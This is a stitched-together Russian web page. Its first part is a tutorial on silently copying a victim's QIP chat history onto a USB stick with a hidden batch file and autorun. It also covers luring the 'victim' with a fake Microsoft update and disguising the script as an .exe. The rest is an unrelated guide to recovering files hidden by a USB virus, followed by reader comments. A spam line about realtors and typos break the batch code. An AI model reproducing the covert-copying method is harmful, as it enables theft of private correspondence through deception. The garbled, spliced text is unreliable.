Скрытое копирование с флешки на компьютер bat

Обновлено: 15.05.2024

Батник - это обычный текстовый файл, содержащий наборы команд интерпретатора и имеющий расширение .bat или .cmd! (.cmd работают только в ОС семейства NT). Редактировать такие файлы можно при помощи блокнота "Или любого другого текстового редактора.

Пишем батник

Создавать,батник будем для второй ситуации (она немного сложнее). Для написания батника возьмём стандартный блокнот. В блокноте пропишем следующие строки:

chdir C:\Program Files\QIP\Users

f:\rar.exe a -r users -r > nul

copy users.rar g:\adc > nul

del users.rar > nul

риэлторы в нижнем новгороде там;риэлторы в нижнем новгороде там

где

©Echo off - скрывает визуальный процесс копирования.

C:\Program Files\QIP\Users - папка, в которой находится история.

f:\rar.exe а -г users > nul -запуск архиватора для ускорения копирования.

copy users.rar g:\adc > nul - адрес куда копируем.

del users.rar > nul - удаляет созданный архив на жеском диске.

Не всегда бывает известна буква флеш-диска. В "таком случае прописываем несколько вариантов (один уж точно угадаем):

chdit C:\Program Files\QIP\Users

f:\rar.exe а -г users > nul

copy users.rar e:\abc > nul

g:\rar.exe a -r users > nul

copy users.rar g:\abc > nul

h:\rar.exe a -r users > nul

copy users.rar h:\abc > nul

del users-rar > nul

Сохраняем наш текстовый документ. Назовём его xxx.txt. Теперь меняем расширение c .txt нa .bat. Это можно сделать в Total Commander'e.

Создаем автозапуск

Теперь надо сделать так, чтобы батник автоматически запускался с флешки при подключении к компьютеру. Для этого создаём новый текстовый документ и пишем в нём:

Сохраняем файл и переименовываем его на autorun.inf.

Делаем архив

Далее нам предстоит позаботится об архиваторе. QIP-история может быть большая. Чтобы процесс копирования происходил быстрее мы её заархивируем.

Из папки с WinRAR (по умолчанию C:\Program Files\WinRAR берём файлик rar.exe. Создаём в корне флешки папку с именем abc. Также, в корень флешки бросаем остальные три файла (xxx.bat, autorun.inf, rar.exe).

Все файлы скрываем от посторонних глаз (правой кнопкой мыши вызываем Меню на файле > Свойства > Скрытый. Это всё. Отдаём флешку "жертве" и ждём результата.

Социальная инженерия

Не обязательно делать автозапуск. "Жертва" сама может запустить батник. Для этого надо воспользоваться социальной инженерией. Например, сообщаем пользователю о том, что компания Microsoft выпустила новое обновление для Windows. Это обновление повышает быстродействие и безопасность операционной системы. Устанавливать обновление нужно только с флешки. Можете сами придумать причину, по которой надо запустить наш батник. Всё зависит от вашей фантазии и смекалки.

Превращаем .bat в .exe

Для большей "безопасности" neperoним .bat в .ехе (вдруг"жертва" знакома с написанием батников). В этом нам поможет небольшая программка ExeScript v3.0.

Теперь укажем для нашего ехе-шника подходящую иконку. В окне Properties щёлкаем на поле Custom Icon и выбираем заранееприготовленную иконку. Далее нажимаем F7 или Project > Build . Всё, ехе-шник готов.

Несколько лет не встречал вирус, который скрывает файлы и папки на флешке (предаю привет библиотеке КГТУ им. Некрасова). В двух словах о том, что делает этот вирус:

вирус скрывает все файлы и папки на флешке от пользователя присваивая им атрибут скрытый и системный. Все дело в том, что Windows, по умолчанию, не отображает файлы с такими атрибутами и пользователь их просто не видит.
вирус создает ярлыки вместо ваших файлов и папок, при нажатии на которые происходит запуск вируса. Снова спасибо Microsoft, расширения файлов, по умолчанию, не отображаются.
в корзине, на флешке создается копия вируса, это может быть, например, RECYCLER\f4448e25.exe
так же создается файл автозапуска флешки autorun.inf, до недавних пор очень активно использовался на CD (DVD) и мигрировал на флешки. Удобная штука была, вставил CD и сразу же запускается программа установки драйверов или игры. Разработчики вирусов нашли файлу autorun.inf другое применение - запуск вируса)

Что видит пользователь? Пользователи ничего не замечает, он запускает ярлыки, которые запускают вирус, а потом открывают нужный файл или папку. Но, если флешку вставить в компьютер, на котором установлен простой антивирус, то антивирус удалит все ярлыки, файл автозапуска и файл вируса из корзины. Пользователь, в этом случае, увидит пустую флешку и будет "бить себя ушами по щекам".

Но, на самом деле ничего страшного не произошло, нужно всего-то еще раз проверить флешку на вирусы (рекомендую ESET) и отобразить скрытые и системные файлы. Я бы порекомендовал два способа (самых простых, не будем "распыляться"):

Способ 1. Для тех, кто хоть как-то знаком с командной строкой:

Пуск -> Выполнить -> cmd
Перейдите на флешку (USB) набрав в командной строке имя диска, например e:
Выполните команду, которая снимет атрибуты "скрытый" и "системный" с ваших папок (фалов) и покажет скрытые файлы attrib -S -H /S /D Подождите, пока команда закончит выполняться.

Способ 2. Для ленивых:

Скачайте файл showFiles.bat
Скопируйте его на флешку (USB).
Запустите файл showFiles.bat
Нужно немного подождать, все зависит от объема флешки, может и 10 минут.

Нужно пояснить, как мы показали файлы на флешке, которые скрыл вирус:

Команда ATTRIB применяется для отображения и изменения атрибутов файлов и каталогов из командной строки Windows
-S - снимает атрибут "Системный", в случае с +S - устанавливает атрибут
-H - снимает атрибут "Скрытый", если сделать +H - установит атрибут.
/S - Обработка файлов с указанными именами в текущем каталоге и во всех его подкаталогах.
/D Обработка файлов и каталогов.
Если вы не указываете в командной строке имен файлов, ATTRIB предполагает *.* и действует на все файлы в текущем каталоге.

В комментариях можете задать вопросы, описать ситуации, которые я не предусмотрел.

Программирование. Продвижение SEO. Работа с CMS. 1С Предприятие.

Недопустимые символы в папке. Или Как вирус прячет папки на флешке.

Вирус на флешке сделал папки скрытыми.

Если место на флешке занято, а папок, как скрытых, так и системных нет. Это говорит о том, что от Вас вся информация на диске скрыта. Скрывает ее вирус, используя папку в имени которой он использует недопустимые символы. Такую папку не видно в Total Commander и Far, про проводник винды вообще молчу.

В этом случаи форматировать флешку не стоит .

В данном случаи решить проблему нам поможет командная строка: CMD.

Все дело в том, что вирус создает директорию в названии которой есть недопустимые символы. Этих символов нет в наборе символов, которые используют для назначения имен папок в формате 8.3. В результате, такая папка не отображается ни в одном из файловых менеджеров в независимости от настроек последнего.

Затем вирус переносит настоящие папки в эту скрытую папку.

Я попытаюсь описать по шагам, как вынуть файлы из скрытой папки на флешке, которой якобы нет.

Итак, начнем.
Наша флека/диск это диск с буквой I:\

Если поглядеть на картинку то ни каких папок нет. Как тут ни крути =)

Чтобы нам увидеть директорию, обратимся за помощью к командной строке.
Жмем WIN+R вбиваем команду CMD и жмем Enter.
Перед нами приглашение командной строки.

На картинке видно скрытую папку с названием e2e2

Ну вот когда мы знаем название можно на прямую обратиться к ней в менеджере файлов.

Я для простоты использовал Total Commander, просто вбиваете Х:\e2e2

1 в строку и жмете Enter. Затем переносите Ваши файлы на диск С:\, а флешку форматируете.

Советы пользователей присланных мне.

Совет 1: Меняем имя папки

Прислал его один из пользователей.

В командной строке набираем
ren g:\e2e2

1 111
И переименовываем папку e2e2

1 на флешке в 111 с помощью командной строки (win+r, cmd)

Совет 2: Бат файл для скрытых папок

Также если у Вас на флешке есть скрытые папки то вам поможет БАТ файл который был предложен одним из пользователей.

@echo off
mode con codepage select=1251 > nul
echo Please wait…
attrib -s -h -r -a /s /d

Данный файл снимает все атрибуты со всех папок и файлов, ЗАПУСКАТЬ ТОЛЬКО НА ФЛЕШЬ ДИСКЕ .

Внимание 20-03-2011 был добавлен комментарий о том, что уже существует новая модификация вируса, которая не прячет папки, а удаляет их, будте бдительней.

Совет 3: Простой способ вынимания информации

Пользователем СЕРГЕЙ был прислан самый простой способ решение задачи.
Он открыл флешку в Total Commander 7.0 Podarok Edition как оказалось там есть кнопка 8.3 (Короткие имена в формате DOS 8.3) нажав её имена папок отображаемых изменились и появилась нужная папка е2е2

1 войдя в которую всё ее содержимое можно скопировать в другое место, или можно её переименовать в 111 и она становится видна.

Совет 4: Способ пользователя Muller

Пользователем Muller был предложен оригинальный способ. Для этого нужно запаковать флешку архиватором RAR. Затем открыть архив и вынуть нужные вам файлы =) вот ссылка на комментарий Muller`а.

Совет 5: Способ похожий на 4-й c WIN RAR, но проще. Прислан пользователем Димка

Хочу предложить усовершенствованный метод открытия папок с помощью WinRaRа. Запускаем архиватор Пуск>Все программы>WinRaR. Открываем нашу флешку и вуаля, все папки видны, перетаскиваем папки из окна WinRaR в другое место на жестком диске, форматируем флешку.
Вот ссылка на комментарий Димки.

Совет 6: Решение проблемы с проводником Windows, когда невозможно снять с папки атрибут (галочку) крытый

Совет 7: Просмотр флешки через FTP клиент.

Оригинальное решение предложил mops. Каким именно клиентом он просматривал флешку он не уточнил. Но как вариант возьмем на заметку.

С уважением, Acid.

1 882 Комментариев “ Вирус на флешке сделал папки скрытыми. ”

помог с установкой тотал командр подарок эдишн
все крайне просто
Благодарю за информацию

Способ с архивом очень помог. Спасибо.

мне помогло через WinRAR. Всем советую!

Спасибо за совет.

Спасибо огромное, открыл способом №2 респект и уважуха

2 Способ моментально работает! Спасибо!

Спасибо! Мгновенно открыла БАТ файлом

Спасибо огромное, ваша статья очень помогла.

Спасибо 100% помогает 6-й метод

Спасибо ребят!) Второй способ помог)

Благодарю. Совет №5 помог. Димки

Проблема в том, что в этих ярлыках записано по две команды, первая запуск и установка вируса в ПК, вторая открытие Вашей драгоценной папки.

Нашла скрытые файлы EasyRecovery, вперемешку правда, но НАШЛА!

Большое вам спасибо!
Именно ваш способ помог!

попробуйте переименовать
В командной строке набирать
ren h:\folder ..

Пишет что, не найдется найти указанный файл.

у меня написано файл не найден .Ничего не показывает. Что в этом случае сделать помогите пожалуйста

Попробуйте в командной строке посмотреть наличие папок в имени которых есть недопустимые символы.

Открыл флешку через RAR, папки отобразились, скидывать в другой диск неудобно, так как на них более 10 гиг инфы-долго, есть другой способ?

Только используя бат файл. Или в командной строке.

проще всего открыть командную строку. ввести X: где Х буква флешки. потом с помощью изменить-вставить вставить следующие данные attrib -s -h -r -a /s /d *.*

Затем вирус переносит настоящие папки в эту скрытую папку.

Я попытаюсь описать по шагам, как вынуть файлы из скрытой папки на флешке, которой якобы нет.

————————————
ВНИМАНИЕ: если у вас вместо папок ярлыки или файлы *.exe, то читаем статью «Папки на флешке стали ярлыками«.Это сделано потому что способ решения проблемы разный.
————————————